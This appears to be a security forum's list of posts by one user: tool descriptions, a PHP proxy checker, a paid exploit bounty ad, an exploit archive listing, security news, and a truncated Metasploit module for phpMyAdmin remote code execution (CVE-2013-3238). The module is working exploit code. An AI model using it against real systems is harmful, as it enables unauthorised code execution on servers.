Jump to content

Fi8sVrs

Active Members
 View Profile  See their activity

  • Posts

    3206

  • Joined

  • Days Won

    87

 Content Type 

Everything posted by Fi8sVrs

  1. Fi8sVrs

    CutyCapt

    Fi8sVrs posted a topic in Programare

    CutyCapt CutyCapt is a small cross-platform command-line utility to capture WebKit's rendering of a web page into a variety of vector and bitmap formats, including SVG, PDF, PS, PNG, JPEG, TIFF, GIF, and BMP. See IECapt for a similar tool based on Internet Explorer. Samples Here are some samples of CutyCapt generated renderings: PNG Snapshot of http://digg.com PNG Snapshot of css Zen Garden: The Beauty in CSS Design SVG Snapshot of MSDN Silverlight Dev Center PDF Snapshot of MSDN Silverlight Dev Center Status CutyCapt has a number of known quirks, most of which are caused by problems with Qt and/or WebKit. For example, while plugin support can be enabled, and the plugins execute properly, their rendering cannot be captured on some platforms. Use of with caution. Requirements CutyCapt depends on Qt 4.4.0+. Download Help wanted! Previously I have used MinGW to make a static Qt build and correspondingly single-file CutyCapt executables for Windows. However, MinGW no longer supports single-file executables for threaded applications, they require to re-distribute a DLL instead, and Qt no longer supports static builds of QtWebkit. Similarily, if I just used Visual Studio 2010, as I do for normal development, proper builds would have to redistribute Microsoft runtime DLLs. Anyone who wants to prepare CutyCapt.exe + *.DLL builds is most welcome to join the project to do so, or alternatively provide them externally which I would then link from here. Let me know if you are interested. Thanks. CutyCapt-Win32-2010-04-26.zip (7MB, .exe for Win32 systems) CutyCapt-Win32-2008-06-11.zip (6MB, .exe for Win32 systems) Source code The source code is available in the SVN repositorty(download tarball). Usage Open a command prompt and ask for help: % CutyCapt --help ----------------------------------------------------------------------------- Usage: CutyCapt --url=http://www.example.org/ --out=localfile.png ----------------------------------------------------------------------------- --help Print this help page and exit --url=<url> The URL to capture (http:...|file:...|...) --out=<path> The target file (.png|pdf|ps|svg|jpeg|...) --out-format=<f> Like extension in --out, overrides heuristic --min-width=<int> Minimal width for the image (default: 800) --min-height=<int> Minimal height for the image (default: 600) --max-wait=<ms> Don't wait more than (default: 90000, inf: 0) --delay=<ms> After successful load, wait (default: 0) --user-styles=<url> Location of user style sheet, if any --header=<name>:<value> request header; repeatable; some can't be set --method=<get|post|put> Specifies the request method (default: get) --body-string=<string> Unencoded request body (default: none) --body-base64=<base64> Base64-encoded request body (default: none) --app-name=<name> appName used in User-Agent; default is none --app-version=<version> appVers used in User-Agent; default is none --user-agent=<string> Override the User-Agent header Qt would set --javascript=<on|off> JavaScript execution (default: on) --java=<on|off> Java execution (default: unknown) --plugins=<on|off> Plugin execution (default: unknown) --private-browsing=<on|off> Private browsing (default: unknown) --auto-load-images=<on|off> Automatic image loading (default: on) --js-can-open-windows=<on|off> Script can open windows? (default: unknown) --js-can-access-clipboard=<on|off> Script clipboard privs (default: unknown) --print-backgrounds=<on|off> Backgrounds in PDF/PS output (default: off) ----------------------------------------------------------------------------- <f> is svg,ps,pdf,itext,html,rtree,png,jpeg,mng,tiff,gif,bmp,ppm,xbm,xpm ----------------------------------------------------------------------------- Build Instructions If your system is set up to compile Qt applications, building CutyCapt should be a simple matter of checking out the source code and running qmake and your version of make. As an example, if you are running Ubuntu Hardy Heron and have configured the system to use packages from hardy-backports, the following should do: % sudo apt-get install subversion libqt4-webkit libqt4-dev g++ % svn co https://cutycapt.svn.sourceforge.net/svnroot/cutycapt % cd cutycapt/CutyCapt % qmake % make % ./CutyCapt --url=http://www.example.org --out=example.png Using CutyCapt without X server You cannot use CutyCapt without an X server, but you can use e.g. Xvfb as light-weight server if you are not running an interactive graphical desktop environment. For example, you could use: % xvfb-run --server-args="-screen 0, 1024x768x24" ./CutyCapt --url=... --out=... Author Björn Höhrmann bjoern@hoehrmann.de CutyCapt - A Qt WebKit Web Page Rendering Capture Utility
  2. Fi8sVrs
    Bug Bounty What is better than getting your exploit published on Packet Storm? Getting paid when your exploit is published on Packet Storm! Packet Storm is offering large sums of cash for well crafted code execution exploits. Why is this program better than other bug bounty programs? Other companies that buy exploits rarely share them with the public and once bought, require that the author does not share them. We are going the other direction on this idea. If the author of the exploit permits it, we plan to release them publicly after sixty days for everyone to download. Win - Win. Why the disclosure? Because it helps the greater good and is in-line with our initiative to provide security engineers the ability to test their systems for recently patched vulnerabilities. I'm in. What are the next steps? You can talk to us by sending an email to getpaid at packetstormsecurity.com with description of your exploit or by submitting the contact form below. Please do not send us the code at this step. The list of targets that we are looking for moves constantly. If you believe that you can offer quality exploits that demonstrate full code execution, it is worth a discussion. It is vitally important that you can articulate what is being exploited, how it is being exploited, what systems and patch levels you have tested with, and that your work is 100% yours to sell. We will not accept exploits that already have public proof of concepts, nor will we accept known plagiarized work. How much money can I make? Different issues offer different levels of compensation. The typical payout for a working exploit ranges anywhere from $1,000 - $7,000 USD and there is the opportunity for even larger payouts if you have written some amazing zero-day. Nothing is off the table. That said, in the typical pay range, we're also soliciting code execution exploits for "0.5-day" vulnerabilities in mainstream software such as Microsoft Windows and Oracle Java that already have a published advisory but with no known working exploit. Bug Bounty ? Packet Storm
  3. Fi8sVrs
    This php script is a small tool for performing proxy checks. /*********************************************** * Multithreaded Proxy Checker * Coded by Miyachung * Janissaries.Org * Miyachung@hotmail.com ------------------------------------------------ * Demonstration -> http://www.youtube.com/watch?v=4icPZHv3W9g * Type list like IP:PORT in a file ***********************************************/ <?php set_time_limit(0); /*********************************************** * Multithreaded Proxy Checker * Coded by Miyachung * Janissaries.Org * Miyachung@hotmail.com ------------------------------------------------ * Demonstration -> http://www.youtube.com/watch?v=4icPZHv3W9g * Type list like IP:PORT in a file ***********************************************/ /*-----------------------------------------------------------------------*/ echo "\n[+]Enter your proxy list: "; $proxy_list = fgets(STDIN); $proxy_list = str_replace("\r\n","",$proxy_list); $proxy_list = trim($proxy_list); echo "[+]Enter number of thread: "; $thread = fgets(STDIN); $thread = str_replace("\r\n","",$thread); $thread = trim($thread); echo "[+]Enter timeout sec: "; $timeout = fgets(STDIN); $timeout = str_replace("\r\n","",$timeout); $timeout = trim($timeout); echo "[+]Checking proxies\n"; echo "-------------------------------------------------------\n"; $open_file = file($proxy_list); $open_file = preg_replace("#\r\n#si","",$open_file); checker($open_file,$thread); /*-----------------------------------------------------------------------*/ function checker($ips,$thread) { global $timeout; $multi = curl_multi_init(); $ips = array_chunk($ips,$thread); $total = 0; $time1 = time(); foreach($ips as $ip) { for($i=0;$i<=count($ip)-1;$i++) { $curl[$i] = curl_init(); curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1); curl_setopt($curl[$i],CURLOPT_URL,$ip[$i]); curl_setopt($curl[$i],CURLOPT_TIMEOUT,$timeout); curl_multi_add_handle($multi,$curl[$i]); } do { curl_multi_exec($multi,$active); usleep(11); }while( $active > 0 ); foreach($curl as $cid => $cend) { $info = curl_getinfo($cend); curl_multi_remove_handle($multi,$cend); if($info['http_code'] != 0) { $total++; echo "[~]Proxy works -> ".$ip[$cid]."\n"; save_file("works.txt",$ip[$cid]); } } } $time2 = time(); echo "\n[+]Total working proxies: $total,checking completed\n"; echo "[+]Elapsed time -> ".($time2-$time1)." seconds\n"; echo "[+]Coded by miyachung || Janissaries.Org\n"; echo "-------------------------------------------------------\n"; } function save_file($file,$content) { $open = fopen($file,'ab'); fwrite($open,$content."\r\n"); fclose($open); } ?>
  4. Fi8sVrs
    A basic guide on how to root a linux server. You can read more information about the tutorial here: Rooting a Linux Server | ZentrixPlus
  5. Fi8sVrs
    This archive contains all of the 118 exploits added to Packet Storm in April, 2013. Directory of C:\1304-exploits\1304-exploits 05/01/2013 01:02 PM <DIR> . 05/01/2013 01:02 PM <DIR> .. 04/09/2013 12:52 AM 1,457 aastra-passwd.txt 04/10/2013 05:25 AM 20,449 adobe_coldfusion_apsb13_03.rb.txt 04/01/2013 09:52 PM 1,386 aspen-traversal.txt 04/07/2013 08:52 PM 2,425 belkinwemo-upload.txt 04/11/2013 06:25 AM 5,775 bigant297-overflow.txt 04/25/2013 12:52 AM 2,654 ciscolinksys2000-dos.txt 04/26/2013 03:41 PM 2,672 cmscameronmckenna-xss.txt 04/21/2013 04:52 PM 3,176 colormix-xssspoofdisclose.txt 04/30/2013 04:10 AM 16,232 CORE-2013-0301.txt 04/30/2013 04:11 AM 20,324 CORE-2013-0303.txt 04/19/2013 03:41 PM 1,338 craftysyntax-rfidisclose.txt 04/05/2013 04:03 AM 5,531 CRD-2013-02.txt 04/24/2013 04:03 AM 5,746 dir615300-execxssxsrf.txt 04/26/2013 10:52 PM 5,350 dir635-xssxsrf.txt 04/09/2013 06:52 AM 4,546 dlink-inject.txt 04/11/2013 07:20 AM 6,862 dlink_diagnostic_exec_noauth.rb.txt 04/13/2013 08:25 PM 3,444 dotclear-spoofxss.txt 04/06/2013 01:52 PM 3,512 easyftpserver-dos.txt 04/09/2013 04:30 AM 4,664 easyphpwebserver-exec.txt 04/27/2013 07:14 PM 631 elecardmpeg-overflow.txt 04/13/2013 07:03 PM 3,303 fmw-passwd.txt 04/30/2013 04:00 AM 1,084 foecms165-sqlxss.txt 04/18/2013 11:14 PM 1,240 forkcms-lfi.txt 04/18/2013 09:52 PM 1,177 forkcms-storedxss.txt 04/18/2013 10:52 PM 1,670 forkcms-xsrf.txt 04/09/2013 08:24 AM 711 foscam-xsrf.txt 04/19/2013 04:14 PM 46,020 foxitreader5-dos.tgz 04/18/2013 05:25 AM 1,900 freefloatftp_user.rb.txt 04/28/2013 02:52 AM 3,530 freepbx-exec.txt 04/03/2013 06:52 PM 4,934 fudforum-exec.txt 04/25/2013 04:29 AM 3,992 groundwork_monarch_cmd_exec.rb.txt 04/08/2013 01:52 PM 3,305 hexchat-overflow.txt 04/24/2013 10:52 PM 1,330 hornbill-sql.txt 04/07/2013 08:03 PM 2,628 hp_smhstart.rb.txt 04/02/2013 07:39 PM 2,572 hp_system_management.rb.txt 04/02/2013 08:30 AM 266 index.html 04/30/2013 03:57 AM 1,616 ipswitchimail-xss.txt 04/12/2013 05:00 AM 1,862 ircd-hybrid.pl.txt 04/27/2013 01:52 PM 1,066 ironlavacorp-sqlshell.txt 04/23/2013 06:43 AM 4,440 java_jre17_reflection_types.rb.txt 04/22/2013 07:14 PM 6,710 joomlacivic-shell.txt 04/21/2013 07:14 PM 3,905 jplayer-xssspoof.txt 04/10/2013 06:29 AM 1,617 karteekdocsplit-exec.txt 04/12/2013 05:03 AM 2,559 kelreddpruview-exec.txt 04/19/2013 04:14 PM 815 kikmessenger-disclose.txt 04/30/2013 03:56 AM 971 killthebox.py.txt 04/30/2013 03:45 AM 2,001 KIS-2013-04.txt 04/17/2013 11:52 PM 3,978 krisonavcms-xssxsrf.txt 04/30/2013 04:04 AM 2,164 linksyse1200n300-xss.txt 04/02/2013 07:45 PM 7,696 linksys_e1500_apply_exec.rb.txt 04/10/2013 06:37 AM 18,523 linksys_wrt54gl_apply_exec.rb.txt 04/16/2013 02:52 AM 1,233 md2pdf-exec.txt 04/15/2013 09:52 PM 1,349 minalicwebserver-overflow.txt 04/19/2013 10:52 PM 4,223 minalic_2_post_winserv03_sp2.py.txt 04/09/2013 06:52 AM 6,885 miniweb-shelltraversal.txt 04/02/2013 07:46 PM 11,778 mongod_native_helper.rb.txt 04/12/2013 05:13 AM 6,001 nagios_nrpe_arguments.rb.txt 04/04/2013 07:29 AM 7,943 netgear_dgn1000b_setup_exec.rb.txt 04/20/2013 05:39 AM 13,730 netgear_dgn2200b_pppoe_exec.rb.txt 04/01/2013 10:52 PM 3,032 networkweathermap-xss.txt 04/19/2013 02:41 PM 925 nginx-inject.txt 04/07/2013 10:52 PM 2,069 otrsfaq-xss.txt 05/01/2013 01:35 AM 1,947 pfshttp-overflow.txt 04/30/2013 04:23 AM 4,895 phpmyadmin_preg_replace.rb.txt 04/28/2013 12:52 AM 1,481 phpvalleymicrojobs-takeover.txt 04/16/2013 12:52 AM 1,677 phpvms-sql.txt 04/30/2013 04:23 AM 7,386 php_wordpress_total_cache.rb.txt 04/04/2013 07:06 AM 843 pollencms-disclose.txt 04/02/2013 10:52 PM 6,087 ponyos-exec.txt 05/01/2013 01:02 PM 0 print.txt 04/23/2013 08:25 PM 1,090 public_phpInjection-smf204.txt 04/04/2013 01:52 PM 671 radiocms-sql.txt 04/01/2013 10:52 PM 723 rubygemldoce-exec.txt 04/03/2013 07:14 PM 8,969 SA-20130403-0.txt 04/04/2013 07:39 PM 5,071 SA-20130404-0.txt 04/09/2013 08:32 AM 3,110 SA-20130408-0.txt 04/17/2013 06:52 PM 5,707 SA-20130417-0.txt 04/17/2013 09:14 PM 7,164 SA-20130417-1.txt 04/18/2013 12:52 AM 4,317 SA-20130417-2.txt 04/19/2013 10:53 AM 2,533 sapconfigservlet-exec.rb.txt 04/30/2013 04:26 AM 4,346 sap_configservlet_exec_noauth.rb.txt 04/18/2013 03:52 PM 4,112 servicestore-xss.txt 04/17/2013 08:52 PM 2,822 sitecomwlm3500-backdoor.txt 04/03/2013 04:30 AM 7,605 smallftpd103-dos.txt 04/03/2013 10:41 PM 2,459 SOS-13-011.txt 04/18/2013 09:52 PM 4,190 swfupload-injectxsrfxss.txt 04/03/2013 11:03 PM 3,255 symphony-sql.txt 04/10/2013 05:03 AM 5,509 sysaxmsssh-dos.txt 05/01/2013 02:12 AM 1,982 syslogwatcherpro-xss.txt 04/03/2013 10:14 PM 2,157 TC-SA-2013-01.txt 04/19/2013 06:03 PM 2,335 tienda-xss.txt 04/29/2013 01:52 PM 1,164 tinymceajax-exec.txt 04/01/2013 01:52 PM 632,912 tinyweb_v1.93_DOS.zip 04/14/2013 03:41 PM 622 todooforum-sqlxss.txt 04/19/2013 03:41 PM 1,892 tplink-freezedos.txt 04/06/2013 11:52 PM 1,965 tplinktd8817-xsrf.txt 04/06/2013 07:14 PM 3,713 twg-disclose.txt 04/19/2013 10:46 AM 6,727 TWSL2013-004.txt 04/08/2013 10:52 PM 2,694 vanilla20184-sql.txt 04/15/2013 05:14 PM 1,079 vanillaforums-xsrf.txt 04/22/2013 06:03 PM 459 vbilling-sql.txt 04/29/2013 02:41 PM 8,205 VL-804.txt 04/21/2013 11:52 PM 977 voipnow-lfi.txt 04/10/2013 06:21 AM 3,013 waraxe-2013-SA102.txt 04/25/2013 10:52 PM 12,421 waraxe-2013-SA103.txt 04/02/2013 06:52 PM 1,648 whmcsgrouppay-sql.txt 04/25/2013 11:25 PM 4,428 windowslight-overflow.txt 05/01/2013 01:41 AM 1,341 wowzamedia-escape.txt 04/01/2013 10:52 PM 4,813 wpfuneralpress-xss.txt 04/26/2013 10:25 PM 11,357 wpsoffice-overflow.tgz 04/11/2013 07:03 AM 2,088 wpspider-sql.txt 04/10/2013 04:52 AM 968 wpspiffy-sql.txt 04/09/2013 04:30 AM 1,703 wptrafficanalyzer-xss.txt 04/10/2013 06:14 AM 1,612 zapms141-sql.txt 04/09/2013 07:23 AM 4,015 zcb-xss.txt 04/02/2013 07:37 PM 4,017 zenworks_control_center_upload.rb.txt 04/17/2013 07:14 PM 2,638 zpanel-exec.txt 04/15/2013 11:52 PM 2,523 ZSL-2013-5136.txt 04/15/2013 11:52 PM 2,812 ZSL-2013-5137.txt 04/16/2013 12:25 AM 5,504 ZSL-2013-5138.txt 120 File(s) 1,150,680 bytes 2 Dir(s) 33,536,339,968 bytes free Download Packet Storm New Exploits For April, 2013 ? Packet Storm
  6. Fi8sVrs
    McAfee said it has found a vulnerability in Adobe Systems' Reader program that reveals when and where a PDF document is opened. The issue emerges when some users launch a link to another file path, which calls on JavaScript application programming interface (API), while Reader alerts a user when they are going to call on a resource from another place. The issue is not a serious problem and does not allow for remote code execution, but McAfee does consider it a security problem and has notified Adobe. It affects every version of Adobe Reader, including the latest version, 11.0.2. wrote McAfee's Haifei Li. McAfee declined to reveal the details of the vulnerability as Adobe is yet to release a patch for it. The vendor said that it has already detected a number of groups and people exploiting it, potentially for malicious purposes. McAfee suggests that Adobe Reader users disable JavaScript until a patch is released Source: Adobe Reader PDF-tracking vulnerability reveals when and where PDF is opened | thehackernews.com
  7. Fi8sVrs
    SAN JOSE, Calif. — Dazzled by the potential of free online college classes, educators are now turning to the gritty task of harnessing online materials to meet the toughest challenges in American higher education: giving more students access to college, and helping them graduate on time. Nearly half of all undergraduates in the United States arrive on campus needing remedial work before they can begin regular credit-bearing classes. That early detour can be costly, leading many to drop out, often in heavy debt and with diminished prospects of finding a job. Meanwhile, shrinking state budgets have taken a heavy toll at public institutions, reducing the number of seats available in classes students must take to graduate. In California alone, higher education cuts have left hundreds of thousands of college students without access to classes they need. To address both problems and keep students on track to graduation, universities are beginning to experiment with adding the new “massive open online courses,” created to deliver elite college instruction to anyone with an Internet connection, to their offerings. While the courses, known as MOOCs, have enrolled millions of students around the world, most who enroll never start a single assignment, and very few complete the courses. So to reach students who are not ready for college-level work, or struggling with introductory courses, universities are beginning to add extra supports to the online materials, in hopes of improving success rates. Here at San Jose State, for example, two pilot programs weave material from the online classes into the instructional mix and allow students to earn credit for them. “We’re in Silicon Valley, we breathe that entrepreneurial air, so it makes sense that we are the first university to try this,” said Mohammad Qayoumi, the university’s president. “In academia, people are scared to fail, but we know that innovation always comes with the possibility of failure. And if it doesn’t work the first time, we’ll figure out what went wrong and do better.” In one pilot program, the university is working with Udacity, a company co-founded by a Stanford professor, to see whether round-the-clock online mentors, hired and trained by the company, can help more students make their way through three fully online basic math courses. The tiny for-credit pilot courses, open to both San Jose State students and local high school and community college students, began in January, so it is too early to draw any conclusions. But early signs are promising, so this summer, Udacity and San Jose State are expanding those classes to 1,000 students, and adding new courses in psychology and computer programming, with tuition of only $150 a course. San Jose State has already achieved remarkable results with online materials from edX, a nonprofit online provider, in its circuits course, a longstanding hurdle for would-be engineers. Usually, two of every five students earn a grade below C and must retake the course or change career plans. So last spring, Ellen Junn, the provost, visited Anant Agarwal, an M.I.T. professor who taught a free online version of the circuits class, to ask whether San Jose State could become a living lab for his course, the first offering from edX, an online collaboration of Harvard and the Massachusetts Institute of Technology. Ms. Junn hoped that blending M.I.T.'s online materials with live classroom sessions might help more students succeed. Dr. Agarwal, the president of edX, agreed enthusiastically, and without any formal agreement or exchange of money, he arranged for San Jose State to offer the blended class last fall. The results were striking: 91 percent of those in the blended section passed, compared with 59 percent in the traditional class. “We’re engineers, and we check our results, but if this semester is similar, we will not have the traditional version next year,” said Khosrow Ghadiri, who teaches the blended class. “It would be educational malpractice.” It is hard to say, though, how much the improved results come from the edX online materials, and how much from the shift to classroom sessions focusing on small group projects, rather than lectures. Finding better ways to move students through the start of college is crucial, said Josh Jarrett, a higher education officer at the Bill and Melinda Gates Foundation, which in the past year has given grants to develop massive open online courses for basic and remedial courses. “For us, 2012 was all about trying to tilt some of the MOOC attention toward the more novice learner, the low-income and first-generation students,” he said. “And 2013 is about blending MOOCs into college courses where there is additional support, and students can get credit. While some low-income young adults can benefit from what I call the free-range MOOCs, the research suggests that most are going to need more scaffolding, more support.” Until now, there has been little data on how well the massive online courses work, and for which kinds of students. Blended courses provide valuable research data because outcomes can easily be compared with those from a traditional class. “The results in the San Jose circuits course are probably the most interesting data point in the whole MOOC movement,” Mr. Jarrett said. Said Dr. Junn, “We want to bring all the hyperbole around MOOCs down to reality, and really see at a granular level that’s never before been available, how well they work for underserved students.” Online courses are undeniably chipping at the traditional boundaries of higher education. Until now, most of the millions of students who register for them could not earn credit for their work. But that is changing, and not just at San Jose State. The three leading providers, Udacity, EdX and Coursera, are all offering proctored exams, and in some cases, certification for transfer credit through the American Council on Education. Last month, in a controversial proposal, the president pro tem of the California Senate announced the introduction of legislation allowing students in the state’s public colleges and universities who cannot get a seat in oversubscribed lower-level classes to earn credit for faculty-approved online versions, including those from private vendors like edX and Udacity. And on Wednesday, San Jose State announced that next fall, it will pay a licensing fee to offer three to five more blended edX courses, probably including Harvard’s “Ancient Greek Heroes” and Berkeley’s"Artificial Intelligence.” And over the summer, it will train 11 other California State campuses to use the blended M.I.T. circuits course. Dr. Qayoumi favors the blended model for upper-level courses, but fully online courses like Udacity’s for lower-level classes, which could be expanded to serve many more students at low cost. Traditional teaching will be disappearing in five to seven years, he predicts, as more professors come to realize that lectures are not the best route to student engagement, and cash-strapped universities continue to seek cheaper instruction. “There may still be face-to-face classes, but they would not be in lecture halls,” he said. “And they will have not only course material developed by the instructor, but MOOC materials and labs, and content from public broadcasting or corporate sources. But just as faculty currently decide what textbook to use, they will still have the autonomy to choose what materials to include.” While San Jose State professors decided what material should be covered in the three Udacity math courses, it was Udacity employees who determined the course look and flow — and, in most cases, appeared on camera. “We gave them lecture notes and a textbook, and they ‘Udacified’ things, and wrote the script, which we edited,” said Susan McClory, San Jose State’s developmental math coordinator. “We made sure they used our way of finding a common denominator.” The online mentors work in shifts at Udacity’s offices in nearby Mountain View, Calif., waiting at their laptops for the “bing” that signals a question, and answering immediately. “We get to hear the ‘aha’ moments, and these all-caps messages ‘THANK YOU THANK YOU THANK YOU,’ ” said Rachel Meltzer, a former clinical research manager at Stanford and mentor who is starting medical school next fall. The mentors answer about 30 questions a day, like how to type the infinity symbol or add unlike fractions — or, occasionally, whether Ms. Meltzer is interested in a date. The questions appear in a chat box on-screen, but tutoring can move to a whiteboard, or even a live conversation. When many students share confusion, mentors provide feedback to the instructors. The San Jose State professors were surprised at the speed with which the project came together. “The first word was in November, and it started in January,” said Ronald Rogers, one of the statistics professors. “Academics usually form a committee for months before anything happens.” But Udacity’s approach was appealing. “What attracted us to Udacity was the pedagogy, that they break things into very small segments, then ask students to figure things out, before you’ve told them the answer,” said Dr. Rogers, who spends an hour a day reading comments on the discussion forum for students in the worldwide version of the class. Results from the pilot for-credit version with the online mentors will not be clear until after the final exams, which will be proctored by webcam. But one good sign is that, in the pilot statistics course, every student, including a group of high school students from an Oakland charter school, completed the first, unproctored exam. “We’re approaching this as an empirical question,” Dr. Rogers said. “If the results are good, then we’ll scale it up, which would be very good, given how much unmet demand we have at California public colleges.” Any wholesale online expansion raises the specter of professors being laid off, turned into glorified teaching assistants or relegated to second-tier status, with only academic stars giving the lectures. Indeed, the faculty unions at all three California higher education systems oppose the legislation requiring credit for MOOCs for students shut out of on-campus classes. The state, they say, should restore state financing for public universities, rather than turning to unaccredited private vendors. But with so many students lacking access, others say, new alternatives are necessary. “I’m involved in this not to destroy brick-and-mortar universities, but to increase access for more students,” Dr. Rogers said. And if short videos and embedded quizzes with instant feedback can improve student outcomes, why should professors go on writing and delivering their own lectures? “Our ego always runs ahead of us, making us think we can do it better than anyone else in the world,” Dr. Ghadiri said. “But why should we invent the wheel 10,000 times? This is M.I.T., No. 1 school in the nation — why would we not want to use their material?” There are, he said, two ways of thinking about what the MOOC revolution portends: “One is me, me, me — me comes first. The other is, we are not in this business for ourselves, we are here to educate students.” Source: http://www.nytimes.com/2013/04/30/education/colleges-adapt-online-courses-to-ease-burden.html?pagewanted=1&_r=3&ref=technology
  8. Fi8sVrs
    Apple users are being warned to stay vigilant following the discovery of a new series of Phishing attacks targeting the Apple ID network. Researchers with Trend Micro have uncovered a series of compromised sites which are being used to host phony log-in pages. Designed to resemble the Apple ID log-in screen, the pages ask users to enter both their usernames and passwords. The compromised credentials are then believed to be harvested by the attackers for future use in account thefts. Researchers noted that the phishing sites have been connected to a spam campaign as well. Designed to resemble an official Apple notification, the messages attempt to direct users to the phishing sites by warning of an impending account removal. "We’ve seen attacks targeting not only American users, but also British and French users," wrote Trend Micro fraud analyst Paul Pajares. "Some versions of this attack ask not only for the user's Apple ID login credentials, but also their billing address and other personal and credit card information." Though the pages themselves are designed to closely resemble the Apple ID site, researchers note that the address information itself can easily be spotted. Aside from not matching Apple's own domains, the pages do not use the secure connection required by Apple to log into its ID platform. In addition to using best practices to avoid spam sites, users can protect themselves from account theft by activating Apple's new two-factor authentication platform. Introduced by the company last month, the security tool pairs an account with a user's mobile phone and asks for a one-time use numerical code which is sent via SMS. Such two-factor controls have long been advocated by security experts for their ability to prevent account loss even when a user's log-in credentials are stolen. Source: Phishing scam targets Apple ID users - IT News from V3.co.uk
  9. Fi8sVrs
    A former employee of Hostgator has been arrested and charged with installing a backdoor that gave him almost unfettered control over more than 2,700 servers belonging to the widely used Web hosting provider. Eric Gunnar Gisse, 29, of San Antonio, Texas, was charged with felony breach of computer security by the district attorney's office of Harris County in Texas, according to court documents. He worked as a medium-level administrator from September 2011 until he was terminated on February 15, 2012, according to prosecutors and a company executive. A day after his dismissal, Hostgator officials discovered a backdoor application that allowed Gisse to log in to servers from remote locations, including a computer located at the Hetzner Data Center in Nuremberg, Germany. He took pains to disguise his malware as a widely used Unix administration tool to prevent his superiors from discovering the backdoor process, prosecutors said. "The process was named 'pcre', a common system file, in order to disguise the true purpose of the process which would grant an attacker unauthorized access into Hostgator's computer network," a Houston Police Department investigator and the document's "affiant," Gordon M. Garrett, wrote in an affidavit. "Complainant told affiant he searched Hostgator's computer network and found the unauthorized 'pcre' process installed on 2723 different Hostgator servers within the computer network." Gisse didn't return a voicemail and e-mail seeking comment for this report. A Court docket shows he is scheduled to be arraigned next month and gives no indication he has entered a plea in the case. He's being held at the Harris County Jail on $20,000 bond, a spokeswoman at the district attorney's office said. The backdoor allowing near-unfettered "root" access to Apache Web server systems was possible because Gisse obtained a Hostgator digital SSH key and transferred it to computers under his control, including one at efnet.pe, Garrett alleged. "The defendant then attempted to penetrate the Hostgator computer network from 'efnet.pe' using the Hostgator digital SSH key," Garrett wrote. Hostgator COO Patrick Pelanne, referred to as the "complainant" in the affidavit, told Ars the backdoor was discovered in February 2012, the same week that Gisse was terminated. While his root access gave Gisse access to private data stored on a large number of customer websites, there's no evidence he used it, the Hostgator executive said. "He did not access customer content," Pelanne told Ars. "We caught it well before he had any chance to do any of that." Given the rapid discovery, the malware was on Hostgator systems for less than a month. Although the affidavit alleges that the backdoor was discovered in February of 2013, Pelanne said that date is erroneous and is most likely the result of a typo. Harris County prosecutors weren't available to confirm that the 2013 date included in court documents was wrong. Gisse took other steps to conceal the compromise of Hostgator systems. On February 19, three days after Pelanne said the backdoor came to light, investigators found that two standard network diagnostic tools had been modified on the Web host's network. Specifically, the "ps" and "netstat" programs—which allow administrators to enumerate all running applications and network connections respectively—had been hacked to hide certain activities. Senior Hostgator security personnel "were activated to respond to, identify, and neutralize the intrusion incident," the affidavit said. While Gisse is presumed innocent until proven otherwise, the unconfirmed narrative provides a potent reminder of the threats that lurk from even mid-level employees inside companies that host sensitive information. Having secret control over 2,700 servers inside a Web hosting provider is no small matter, considering each machine can be used for hundreds or possibly thousands of individual websites. But the alleged series of events also highlights the measures employers can take to keep tabs on rogue workers. Among other things, a desktop monitoring system that took screenshots of employee workstations in one-minute increments helped Hostgator officials quickly zero in on Gisse. Source: http://arstechnica.com/security/2013/04/former-employee-arrested-charged-with-rooting-2700-hostgator-servers/
  10. Fi8sVrs
    This Metasploit module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php. This affects versions 3.5.x below 3.5.8.1 and 4.0.0 below 4.0.0-rc3. PHP versions greater than 5.4.6 are not vulnerable. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'phpMyAdmin Authenticated Remote Code Execution via preg_replace()', 'Description' => %q{ This module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php This affects versions 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3. PHP versions > 5.4.6 are not vulnerable. }, 'Author' => [ 'Janek "waraxe" Vind', # Discovery 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-3238' ], [ 'PMASA', '2013-2'], [ 'waraxe', '2013-SA#103' ], [ 'EDB', '25003'], [ 'OSVDB', '92793'], [ 'URL', 'http://www.waraxe.us/advisory-103.html' ], [ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { 'BadChars' => "&\n=+%", # Clear out PMA's error handler so it doesn't lose its mind # and cause ENOMEM errors and segfaults in the destructor. 'Prepend' => "function foo($a,$b,$c,$d,$e){return true;};set_error_handler(foo);" }, 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 25 2013')) register_options( [ OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']), OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']), OptString.new('PASSWORD', [ false, "Password to authenticate with", '']) ], self.class) end def check begin res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/js/messages.php') }) rescue print_error("Unable to connect to server.") return CheckCode::Unknown end if res.code != 200 print_error("Unable to query /js/messages.php") return CheckCode::Unknown end php_version = res['X-Powered-By'] if php_version print_status("PHP Version: #{php_version}") if php_version =~ /PHP\/(\d)\.(\d)\.(\d)/ if $1.to_i > 5 return CheckCode::Safe else if $1.to_i == 5 and $2.to_i > 4 return CheckCode::Safe else if $1.to_i == 5 and $2.to_i == 4 and $3.to_i > 6 return CheckCode::Safe end end end end else print_status("Unknown PHP Version") end if res.body =~ /pmaversion = '(.*)';/ print_status("phpMyAdmin version: #{$1}") case $1.downcase when '3.5.8.1', '4.0.0-rc3' return CheckCode::Safe when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2' return CheckCode::Vulnerable else if 